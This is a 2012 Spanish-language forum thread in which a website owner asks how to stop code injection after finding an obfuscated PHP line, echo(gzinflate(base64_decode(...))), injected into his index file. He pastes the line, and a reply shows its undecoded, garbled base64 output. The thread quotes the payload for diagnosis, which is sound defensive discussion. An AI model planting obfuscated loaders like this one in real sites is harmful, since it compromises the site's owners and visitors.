Foros del Web » Programación para mayores de 30 ;) » Bases de Datos General » Mysql »

Inyección de código, como lo soluciono?

Estas en el tema de Inyección de código, como lo soluciono? en el foro de Mysql en Foros del Web. Hola a todos, hoy a la mañana note algo raro en mi web, ya que no podía acceder desde mi celular, cuando volvi a mi ...
  #1 (permalink)  
Antiguo 20/03/2012, 10:12
Avatar de xarmagedonx  
Fecha de Ingreso: marzo-2009
Mensajes: 360
Antigüedad: 15 años, 9 meses
Puntos: 29
Busqueda Inyección de código, como lo soluciono?

Hola a todos, hoy a la mañana note algo raro en mi web, ya que no podía acceder desde mi celular, cuando volvi a mi casa, intente ingresar y marcaba error.

Examiné el index y me habían inyectado un código como este: encode(64(( y aca un monton de texto)))

No pude copiarlo porque lo borre enseguida para que volviera a funcionar. Pero como puedo evitar este tipo de ataques??. Yo habia puesto en el código algunas recomendaciones que dan para evitar inyecciones, pero supongo que el problema estará en el paginador.

Si necesitan la web es la N°2 de mi firma. Saludos y gracias!!


EDITO: aca tengo el codigo...
Código MySQL:
Ver original
  1. #d93065#
  2. echo(gzinflate(base64_decode("TYvLDYAgDEBXIR2A3g1yd4yKjUIQSalGt9eEi9f3cS1IrGr0qTyC8q2Y6KJOwWQq60nrp/60SRhhU60DYizKIrzYcOyWBHHav75wwxxnIXlsamC8wz77Fw==")));
  3. #/d93065#
  #2 (permalink)  
Antiguo 21/03/2012, 07:57
Colaborador
 
Fecha de Ingreso: marzo-2008
Ubicación: Sabadell
Mensajes: 4.897
Antigüedad: 16 años, 9 meses
Puntos: 574
Respuesta: Inyección de código, como lo soluciono?

Lo que se llama inyección de código se suele hacer atraves de formularios... tienes alguno.

base64_decode("...")=M닍ࠌ@W!ލrw슍BI醷ׄ뗷q-H쪴鼂⭘袎d*뉫羴IaS탢,ʢ옰얄qڿg!ylj`샾뗀

http://paraisolinux.com/decodificar-...nflate-base64/
__________________
Quim
--------------------------------------------------
Ayudar a ayudar es una buena práctica!!! Y da buenos resultados.

Última edición por quimfv; 21/03/2012 a las 08:05

Etiquetas: busquedas, inyección, inyecciones
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 04:22.